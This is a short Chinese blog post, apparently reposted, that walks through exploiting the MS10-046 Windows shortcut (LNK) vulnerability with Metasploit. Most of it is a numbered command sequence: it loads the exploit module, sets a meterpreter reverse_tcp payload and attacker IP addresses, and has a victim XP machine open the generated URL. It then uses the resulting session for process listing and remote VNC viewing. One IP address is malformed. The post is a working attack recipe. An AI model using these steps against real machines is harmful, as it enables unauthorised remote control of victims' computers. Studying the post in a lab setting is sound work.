zoukankan      html  css  js  c++  java
  • MS10-046漏洞利用

    MS10-046远程执行漏洞(Windows快捷方式LNK文件自动执行代码漏洞攻击) 

    命令:

    1.   msfconsole    //启动MSF Metasploit

    2.   search ms10-046   //搜索漏洞

    3.   use windows/browser/ms10_046_shortcut_icon_dllloader  //加载漏洞模块

    4.   set payload windows/meterpreter/reverse_tcp   //设置一个PAYLOAD为反弹连接shell

    5.   show options     //查看相关设置

    6.   set SRVHOST 192.168.1.10      //设置攻击者自身IP

    7.   set LHOST 192.168.10             //设置反弹连接回来的IP (攻击者自身IP)

    8.   exploit         //开始执行漏洞...

    9.   会生成一个URL连接  复制这个地址 去另一台XP系统机器上测试  用浏览器打开会跳到共享文件夹下

    10. 然后我们在来到MSF终端看见漏洞执行成功了  有一个连接会话 ID 1

     命令 :

     sessions -l        查看存在的会话

     sessions -i 1       选着会话1

    11. 输入ps命令查看进程   或者 输入run vnc 查看远程桌面 等等

  • 相关阅读:
    Js 作用域链
    JS 上下文模式
    javascript
    HTTP概念进阶
    JavaScript运行机制详解
    浅谈循环中setTimeout执行顺序问题
    Js 运行机制 (重点!!)
    javascript
    jQuery 知识点总结
    Educational Codeforces Round 87 (Rated for Div. 2)
  • 原文地址:https://www.cnblogs.com/journeyIT/p/8261768.html
Copyright © 2011-2022 走看看